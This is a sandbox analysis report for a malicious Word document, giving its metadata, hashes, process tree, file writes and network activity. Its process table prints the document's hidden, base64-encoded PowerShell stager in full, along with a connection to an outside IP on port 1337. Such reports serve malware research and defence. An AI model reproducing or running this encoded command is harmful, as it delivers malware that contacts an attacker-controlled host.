File name: | 836ffe62de205e503c1f2b9a8fd9032f2d8e18b18fd928faccd24c8a07e7c854.doc |
Full analysis: | https://app.any.run/tasks/6ac7d1d1-dff5-48b6-8583-daa37918a4e3 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 01:43:33 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: user, Template: Normal.dotm, Last Saved By: user, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Jul 13 19:39:00 2019, Last Saved Time/Date: Sat Jul 13 19:39:00 2019, Number of Pages: 1, Number of Words: 194, Number of Characters: 1107, Security: 0 |
MD5: | FE546B0F5BF8AE3EDDB5F91C92426C19 |
SHA1: | DCE8431D2F69AD3DC9BB260E4670397B08572616 |
SHA256: | 836FFE62DE205E503C1F2B9A8FD9032F2D8E18B18FD928FACCD24C8A07E7C854 |
SSDEEP: | 384:tIzxcgyGcS2rBQsyDk0jk87FnHhChUehoMqItF51Vc:OcdrSIjCnBChVho9e |
.doc | | | Microsoft Word document (45.7) |
---|---|---|
.xls | | | Microsoft Excel sheet (42.8) |
CompObjUserType: | Microsoft Office Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 39 |
Hyperlinks: |
|
CodePage: | Windows Latin 1 (Western European) |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 12 |
CharCountWithSpaces: | 1299 |
Paragraphs: | 2 |
Lines: | 9 |
Company: | - |
Security: | None |
Characters: | 1107 |
Words: | 194 |
Pages: | 1 |
ModifyDate: | 2019:07:13 18:39:00 |
CreateDate: | 2019:07:13 18:39:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 2 |
LastModifiedBy: | user |
Template: | Normal.dotm |
Author: | user |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3476 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\836ffe62de205e503c1f2b9a8fd9032f2d8e18b18fd928faccd24c8a07e7c854.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3180 | powershell.exe -WindowStyle hidden -nologo -noprofile -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVgBZADUAUgBhADgASgBBAEUASQBUAGYAQgBmAC8ARABJAGQAZQB5AEIAMwBIAEoAbQBhAFIAUwBRAHcAcAB0AEsARQBVAG8AVgBoAHEAaABEAHkARQBQAEoAbABuADAAVwBoAFAAQgBMAE0AUwBTACsAdAA5ADcAawBWAG8AUQBsAG0ARQBmADUAcAB1AFoAZABtAHQAMgBKAEUAQQByADAAUQAwAEgAcwBxAGsAaQBXAEYAQQA3AGYAcwBzAC8AcQBXAEMAeABJAE0AWgBrAFgAMwB3AFIATgA3AGkASwBsAC8ASABPAFUATQAwAHcAMABwADYAUABFAC8AYwBlAHQAUgArAGcAbgB2AG8AagBSADMAdgBlAFYAQwBsADgASQBVADcANABRAE8AcwBLAFYASgBqAG0AMwAwAHgAcABsAHMAbQBjAEkAeABmAHgATABnAGkAOAA0AE8AZQBtAGMAMAA5AGgAMgB6AGMAQwBTAEIAUABaAE8AbgB5AG4AZABRAG4AVwA1AEwAaQBPAFYAWAB5AGwAZQBzAE4AYgBwAGMAUwA0AEoAdQBHAHEATABwAFQAbAAxAGEASQBWAEgAUgBrAGYAawAzAGcAKwBmADYANgBMAGYAVwBuAHEAegBhAFgAVwB2AHAAYwBjAG8AMABMAFoAYwBBAFEAcAA5ADIANwA2AE0AMgBhAHoAMgBSAGsAOABBADAAOQAyAFgAUQBOAGcANgBDAGgAawBLAFMAWQBQAHQAMQByADEAVQBJAFUAZgBCADgATQBFAEYAdQArAEQAbQB2ADkAQgBwACsASABBADMAaQA4AD0AJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE8DB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3180 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I2JK1H2XHNKBOGSKBB6X.temp | — | |
MD5:— | SHA256:— | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:337FDB5F9D3D8ACDB831AEE7056AB95A | SHA256:76EC22F04E278DC6115BCB0A5A49300AE44AEC5B1AE1B9EBD30F22D0CACB614D | |||
3180 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10f1d4.TMP | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
3180 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$6ffe62de205e503c1f2b9a8fd9032f2d8e18b18fd928faccd24c8a07e7c854.doc | pgc | |
MD5:CA08A6FA645607E87D00E34680096C83 | SHA256:9CC5D139624ADCE5BAAEF25DA11FCD5EAA709901CFD5161B8DD872D70DB9924A |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 134.209.145.174:1337 | — | — | US | unknown |
3180 | powershell.exe | 134.209.145.174:1337 | — | — | US | unknown |